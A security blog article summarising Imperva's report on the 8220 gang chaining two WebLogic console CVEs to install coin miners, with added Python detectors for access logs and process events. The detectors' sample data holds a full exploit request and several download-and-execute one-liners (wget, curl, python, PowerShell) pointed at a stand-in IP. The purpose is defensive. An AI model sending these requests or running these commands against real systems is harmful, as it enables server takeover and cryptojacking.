In a report published on December 14th, 2023, Imperva described a wave of attacks exploiting known vulnerabilities in Oracle WebLogic Server. Imperva's Threat Research team observed increased activity from the 8220 gang, a China-based, financially motivated cryptojacking group, targeting WebLogic installations to deploy cryptocurrency-mining malware.
First spotted in 2017, the 8220 gang is notorious for mass malware campaigns that abuse new vulnerabilities as they are discovered. Their latest campaigns take advantage of authentication flaws and remote code execution bugs in WebLogic to breach servers and install Monero miners.
Imperva's report contains useful detail on the attack vectors 8220 uses, as well as indicators of compromise that can help organizations detect intrusions. Below we examine the specific WebLogic vulnerabilities exploited, the techniques used to compromise systems, and the malware installed to divert compute resources to illicit cryptocurrency mining. Understanding how the chain works is the first step toward detecting it on internet-facing infrastructure.
The 8220 gang, named after the TCP port it has historically used for command-and-control traffic, has exploited vulnerabilities in internet-facing software to distribute cryptojacking malware since 2017. Researchers assess the group to be China-based on the strength of its tooling, infrastructure, and procedures; it is a financially motivated crimeware operation rather than an attributed state actor.
Early operations targeted Drupal, Hadoop YARN, and Apache Struts, compromising systems to mine Monero. The group continues to rely on recently disclosed bugs in products from many vendors, including Oracle WebLogic, VMware, Redis, and Atlassian Confluence.
Once inside the network, the gang uses living-off-the-land binaries to move laterally and escalate privileges. A vast toolkit enables them to fingerprint systems, exploit additional weaknesses, and evade detection. Payloads often include coin miners tailored to the compromised architecture, configuration scripts, and backdoors for persistent access.
While the 8220 gang prioritizes stealth over destruction, the constant evolution of techniques makes them unpredictable and dangerous. Their operations generate substantial illicit profits through the theft of compute resources. Understanding this threat actor is key to protecting internet-facing infrastructure from server takeovers.
Imperva’s report details two critical Oracle WebLogic vulnerabilities chained together by the 8220 gang to achieve full remote code execution:
CVE-2020-14883 – A remote code execution flaw in the WebLogic Administration Console. An attacker who can reach the console sends a request whose handle parameter names a gadget class; the server instantiates it and ends up executing arbitrary OS commands. On its own, this flaw requires access to the console, that is, valid credentials.
CVE-2020-14882 – An authentication bypass in the same console. A double-URL-encoded path traversal that starts from a path the console serves without login reaches the console entry point (console.portal) unauthenticated. Combined with the RCE issue, it removes the authentication requirement entirely.
Chaining the two lets the 8220 gang compromise Oracle WebLogic servers without any credentials, and the whole chain fits in a single HTTP request: the encoded traversal in the URL path bypasses authentication (CVE-2020-14882), while the handle parameter in the query string of that same request triggers code execution (CVE-2020-14883). The payload either points the server at an attacker-hosted XML file or carries the code to run inline.
These chained exploits let the group breach servers en masse with little effort, and public proof-of-concept code for the pair has been available since late 2020. Organizations running vulnerable Oracle WebLogic installations are prime targets, especially those whose Administration Console is reachable from the internet. Applying Oracle's October 2020 Critical Patch Update (or any later CPU) closes both vectors; where patching lags, the console should not be exposed to the internet at all.
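To turn the chain above into a detection, here is an added example (it is not from Imperva's report or from the original post) that scans access-log lines for both halves of the chain: a double-encoded traversal out of an unauthenticated /console/ path that resolves to console.portal, and a handle parameter naming a gadget class. The gadget class names are the publicly documented ones for CVE-2020-14883, the unauthenticated prefixes are taken from public proof-of-concept write-ups, the log format is assumed to be Apache-style combined, and the log lines are constructed.

```python
import posixpath
import re
from urllib.parse import unquote, urlsplit

# Gadget classes publicly documented for CVE-2020-14883 (from public advisories and
# write-ups, not from the page): the first executes code inline, the second loads a remote XML.
GADGET_CLASSES = (
    "com.tangosol.coherence.mvel2.sh.ShellSession",
    "com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext",
)
# Static-resource paths the console serves without login; the CVE-2020-14882
# traversal starts from one of these (assumption based on public PoCs).
UNAUTH_PREFIXES = ("/console/css/", "/console/images/")

# Apache combined/common access-log format (assumption: adapt to your front-end proxy).
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def decode_twice(s):
    """The bypass relies on double URL encoding (%252e -> %2e -> .), so decode twice."""
    return unquote(unquote(s))


def analyze_request(uri):
    """Return the CVE identifiers whose signature appears in one request URI."""
    parts = urlsplit(uri)
    raw_path = parts.path
    decoded_path = decode_twice(raw_path)
    normalized = posixpath.normpath(decoded_path)
    findings = []
    # CVE-2020-14882: the raw path sits under an unauthenticated prefix, but once the
    # encoded traversal is decoded it resolves to the console entry point.
    if (raw_path.startswith(UNAUTH_PREFIXES)
            and ".." in decoded_path
            and normalized.endswith("console.portal")):
        findings.append("CVE-2020-14882")
    # CVE-2020-14883: the handle parameter names one of the gadget classes.
    decoded_query = decode_twice(parts.query)
    if "handle=" in decoded_query and any(c in decoded_query for c in GADGET_CLASSES):
        findings.append("CVE-2020-14883")
    return findings


def scan_log(text):
    """Return (line_no, client, method, findings) for every request that matches."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        findings = analyze_request(m["uri"])
        if findings:
            hits.append((line_no, m["client"], m["method"], findings))
    return hits


# Constructed sample: a normal login page view, the bypass alone, the full chain
# in one request, and a benign static image fetch.
SAMPLE_LOG = """\
203.0.113.10 - - [14/Dec/2023:10:01:02 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 1234
203.0.113.10 - - [14/Dec/2023:10:01:05 +0000] "GET /console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=HomePage1 HTTP/1.1" 200 4567
203.0.113.10 - - [14/Dec/2023:10:01:07 +0000] "POST /console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession%28%22constructed%22%29 HTTP/1.1" 200 890
198.51.100.7 - - [14/Dec/2023:10:02:00 +0000] "GET /console/images/logo.png HTTP/1.1" 200 3210
"""

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Decoding twice matters: a WAF or log rule that decodes once still sees `%2e%2e%2f` and never matches `..`. Note that a 200 response to the bypass request is what separates a vulnerable host from a patched one, so the status field is worth keeping in the output when you adapt this to your own logs.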
Imperva's analysis of how the 8220 gang exploits these two vulnerabilities, and of the payloads delivered through them, breaks down as follows:
[Figure: Method of exploitation of CVE-2020-14883 and CVE-2020-14882 (image source: Imperva)]
The gang uses two different gadget chains. In the first, the handle parameter makes the server load an attacker-hosted XML file; the bean definitions in that XML in turn invoke the class that runs a command on the underlying operating system (OS).
The XML varies with the target OS. On Linux hosts, it tries to fetch the second-stage files with several downloaders in turn, so that at least one works on a minimal host: cURL, wget, lwp-download, a base64-encoded python urllib one-liner, and a custom base64-encoded bash function.
On Windows hosts, it uses a simple PowerShell WebClient download to fetch and run a PowerShell script.
In another variant, a different gadget chain executes Java code directly, with no externally hosted XML file. The injected Java first determines the OS (Windows or Linux) and then runs the matching command string.
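The downloader variants in the paragraphs above map directly onto process-creation telemetry: the WebLogic JVM has no business spawning a shell that fetches and runs remote content. The following added example (my own code, not Imperva's and not the page author's) classifies constructed process events with that rule and decodes base64 arguments first, so the encoded python urllib and bash-function variants are matched on their cleartext rather than missed. Process and field names, the assumed stock JVM binary name, and the sample events are all assumptions.

```python
import base64
import binascii
import re

# WebLogic runs inside a JVM; these are the stock binary names (assumption).
WEBLOGIC_PARENTS = {"java", "java.exe"}
# Shells the gadget chain spawns on Linux and Windows hosts.
SHELLS = {"sh", "bash", "dash", "cmd.exe", "powershell.exe", "pwsh.exe"}

# The second-stage retrieval methods the report lists, as regexes over a command line.
DOWNLOADER_PATTERNS = {
    "curl": re.compile(r"\bcurl\b[^|;&]*https?://", re.I),
    "wget": re.compile(r"\bwget\b[^|;&]*https?://", re.I),
    "lwp-download": re.compile(r"\blwp-download\b", re.I),
    "python-urllib": re.compile(r"\bpython\S*\b.*\b(urllib|base64\.b64decode)\b", re.I),
    "base64-decode": re.compile(r"\bbase64\s+(-d|--decode)\b|b64decode", re.I),
    "powershell-webclient": re.compile(r"Net\.WebClient|DownloadString|DownloadFile", re.I),
}
# Anything that looks like a base64 argument long enough to hide a command.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")


def _basename(path):
    # os.path.basename only splits on the host's separator; handle both styles.
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def decode_base64_blobs(command_line):
    """Decode every base64-looking argument that yields printable text."""
    decoded = []
    for token in B64_TOKEN.findall(command_line):
        try:
            raw = base64.b64decode(token, validate=True)
        except (binascii.Error, ValueError):
            continue  # not valid base64 (e.g. a long identifier)
        text = raw.decode("utf-8", errors="replace")
        if text and all(ch.isprintable() or ch in "\n\t" for ch in text):
            decoded.append(text)
    return decoded


def classify_event(event):
    """Rule: WebLogic JVM -> shell -> download-and-execute pattern, direct or inside base64."""
    parent = _basename(event["parent_image"])
    image = _basename(event["image"])
    cmd = event["command_line"]
    if parent not in WEBLOGIC_PARENTS or image not in SHELLS:
        return {"suspicious": False, "reasons": [], "decoded": []}
    decoded = decode_base64_blobs(cmd)
    reasons = []
    for label, pattern in DOWNLOADER_PATTERNS.items():
        if pattern.search(cmd):
            reasons.append(label)
        elif any(pattern.search(text) for text in decoded):
            reasons.append(label + " (inside base64)")
    return {"suspicious": bool(reasons), "reasons": reasons, "decoded": decoded}


def scan_events(events):
    """Return (index, reasons) for every suspicious event."""
    hits = []
    for i, event in enumerate(events):
        verdict = classify_event(event)
        if verdict["suspicious"]:
            hits.append((i, verdict["reasons"]))
    return hits


# Constructed sample telemetry (field names are an assumption; adapt to your EDR or auditd schema).
B64_CURL = base64.b64encode(b"curl -fsSL http://198.51.100.20/x.sh | bash").decode()
B64_PY = base64.b64encode(
    b"import urllib.request;exec(urllib.request.urlopen('http://198.51.100.20/p.py').read())"
).decode()
JAVA = "/usr/lib/jvm/java-8/bin/java"
SAMPLE_EVENTS = [
    {"parent_image": JAVA, "image": "/bin/sh",
     "command_line": 'sh -c "wget -q -O - http://198.51.100.20/x.sh | sh"'},
    {"parent_image": JAVA, "image": "/bin/bash",
     "command_line": f'bash -c "echo {B64_CURL} | base64 -d | bash"'},
    {"parent_image": JAVA, "image": "/bin/sh",
     "command_line": f"sh -c \"python3 -c 'import base64;exec(base64.b64decode(b\\\"{B64_PY}\\\"))'\""},
    {"parent_image": "C:\\Oracle\\jdk\\bin\\java.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "command_line": "powershell -nop -c \"IEX((New-Object Net.WebClient).DownloadString('http://198.51.100.20/w.ps1'))\""},
    {"parent_image": JAVA, "image": "/bin/sh", "command_line": 'sh -c "ls -la /tmp"'},
    {"parent_image": "/bin/bash", "image": "/usr/bin/curl",
     "command_line": "curl -fsSL https://example.invalid/update.sh"},
]

if __name__ == "__main__":
    for index, reasons in scan_events(SAMPLE_EVENTS):
        print(index, reasons)
```

Keying on the parent process is what keeps the rule quiet: the same curl or PowerShell one-liner run by an administrator from an interactive shell is not flagged, while any of the report's downloader variants spawned by the application server is. The base64 pass is the part that matters for this actor, since two of the five Linux methods only reveal the download URL after decoding.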
According to Imperva’s telemetry, the 8220 gang does not focus on specific industries or countries when carrying out attacks. Recent campaigns have targeted healthcare, telecommunications, and financial services organizations in various regions like the United States, South Africa, Spain, Colombia, and Mexico.
The actors appear opportunistic in choosing which vulnerable WebLogic servers to exploit, with no defined targeting pattern: they hit whatever their scanning finds. Any organization, regardless of size or sector, running unpatched Oracle software that is reachable from the internet is at risk. This underlines the importance of prompt patching and of layered controls that catch exploitation when a patch is missed.
By taking advantage of any unpatched server they can compromise to deploy coin miners, the 8220 gang casts a wide net harvesting precious compute resources. Their broad attacks affect entities across both public and private sectors globally.
The 8220 gang shows how quickly opportunistic actors turn public exploits for widely deployed software into mass campaigns: CVE-2020-14882 and CVE-2020-14883 were patched roughly three years before the activity Imperva reported. Defending against this kind of actor is less about novel technology than about discipline: inventory internet-facing WebLogic and other middleware, apply vendor patches promptly, keep administrative consoles off the internet, and monitor both the web tier and host process activity for the exploitation and downloader patterns described above.
Arun KL is a cybersecurity professional with 15+ years of experience in IT infrastructure, cloud security, vulnerability management, Penetration Testing, security operations, and incident response. He is adept at designing and implementing robust security solutions to safeguard systems and data. Arun holds multiple industry certifications including CCNA, CCNA Security, RHCE, CEH, and AWS Security.